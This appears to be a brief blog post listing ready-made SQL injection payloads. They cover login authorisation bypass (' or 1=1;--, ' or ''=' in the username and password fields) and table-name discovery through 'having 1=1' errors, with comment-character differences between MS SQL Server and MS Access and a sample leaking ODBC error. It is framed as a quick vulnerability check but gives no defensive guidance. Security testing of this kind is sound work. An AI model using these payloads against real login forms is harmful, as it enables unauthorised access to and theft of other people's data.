Below are some of the SQL Injection syntax that allow you to have a quick check if there is a SQL Injection vulnerability exist.
Authorization Bypass:
';--
' or 1=1;--
Username: ' or ''='
Password: ' or ''='
Then ending character in MS SQL Server and MS Access is different.
For MS SQL Server, the ending character is ;
For MS Access, the ending character is #
Table Name Checking:
' having 1=1;--
' having 1=1--
If you got the Error message like below, then you can use advanced SQL syntax to check the column in the table. (please just google it, or wait for the next blog :)
--
Microsoft OLE DB Provider for ODBC Drivers Error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'DBName.dbo.TableName.ColumnName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/whatever.asp, line 123
Please use it with your own responsibility.
